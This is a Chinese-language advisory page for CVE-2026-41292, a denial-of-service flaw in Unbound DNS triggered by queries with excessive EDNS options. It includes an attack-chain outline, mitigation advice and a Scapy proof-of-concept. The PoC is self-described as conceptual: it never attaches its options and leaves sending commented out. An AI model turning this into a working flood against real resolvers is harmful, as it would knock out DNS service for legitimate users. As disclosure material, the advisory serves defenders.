CVE-2026-41292 CVSS 7.5 高危

CVE-2026-41292 NLnet Labs Unbound 拒绝服务漏洞

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41292

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NLnet Labs Unbound

漏洞概述

NLnet Labs Unbound 版本 1.25.0 及之前版本存在安全漏洞。攻击者通过发送包含过多 EDNS 选项的恶意 DNS 查询，可导致服务线程在解析时被长时间占用，从而引发服务降级或拒绝服务。该问题已在 1.25.1 版本中修复。

技术细节

该漏洞源于 Unbound 在处理 DNS 扩展机制（EDNS）选项时的缺陷。受影响版本未对传入的 EDNS 选项数量进行有效限制。当解析器接收到包含大量 EDNS 选项的 DNS 查询时，必须消耗大量 CPU 资源来解析这些选项并构建内部数据结构。攻击者利用此特性，构造包含冗长 EDNS 选项列表的特制数据包发送给目标服务器。由于解析过程极其耗时，Unbound 的工作线程会被锁定，无法处理其他合法请求。通过协同发送此类请求，攻击者可耗尽所有线程资源，导致 DNS 服务完全瘫痪。

攻击链分析

STEP 1

侦察

攻击者识别目标网络中运行的 NLnet Labs Unbound DNS 解析器服务。

STEP 2

构造攻击载荷

攻击者编写脚本生成特制的 DNS 数据包，其中包含超长列表的 EDNS 选项（例如超过 100 个）。

STEP 3

发送恶意请求

攻击者向目标 Unbound 服务器发送大量包含恶意 EDNS 选项列表的 DNS 查询请求。

STEP 4

资源耗尽

Unbound 服务器在解析这些选项时，工作线程被长时间占用，无法处理正常的 DNS 查询。

STEP 5

拒绝服务

随着大量恶意请求到达，服务器所有线程被阻塞，导致合法用户的 DNS 解析请求失败，服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import sys
from scapy.all import IP, UDP, DNS, DNSQR, EDNS0

def send_exploit(target_ip):
    # Construct a base DNS query
    dns_query = DNS(rd=1, qd=DNSQR(qname="example.com"))
    
    # Add a large number of EDNS0 options to trigger the vulnerability
    # Unbound <= 1.25.0 does not limit this effectively, causing DoS
    options = []
    for i in range(150):  # Sending more than the fixed limit (100)
        options.append(EDNS0(opt_code=0x000A, opt_data=b"A" * 10))
    
    dns_query[DNS].arcount = len(options)
    # Note: Scapy EDNS0 implementation might need specific handling for RDATA
    # This is a conceptual PoC demonstrating the payload structure.
    # In a real exploit, raw bytes might be crafted to ensure the options count is high.
    
    packet = IP(dst=target_ip)/UDP(dport=53)/dns_query
    
    print(f"[+] Sending malicious packet to {target_ip} with {len(options)} EDNS options...")
    # send(packet)

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print("Usage: python3 poc.py <target_ip>")
    else:
        send_exploit(sys.argv[1])

影响范围

NLnet Labs Unbound <= 1.25.0

防御指南

临时缓解措施

建议立即将 Unbound 升级至 1.25.1 版本，该版本已将可接受的传入 EDNS 选项限制为 100 个。如果无法立即升级，应限制对 DNS 服务器的访问来源，并监控服务器资源消耗情况，异常流量时进行限流。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表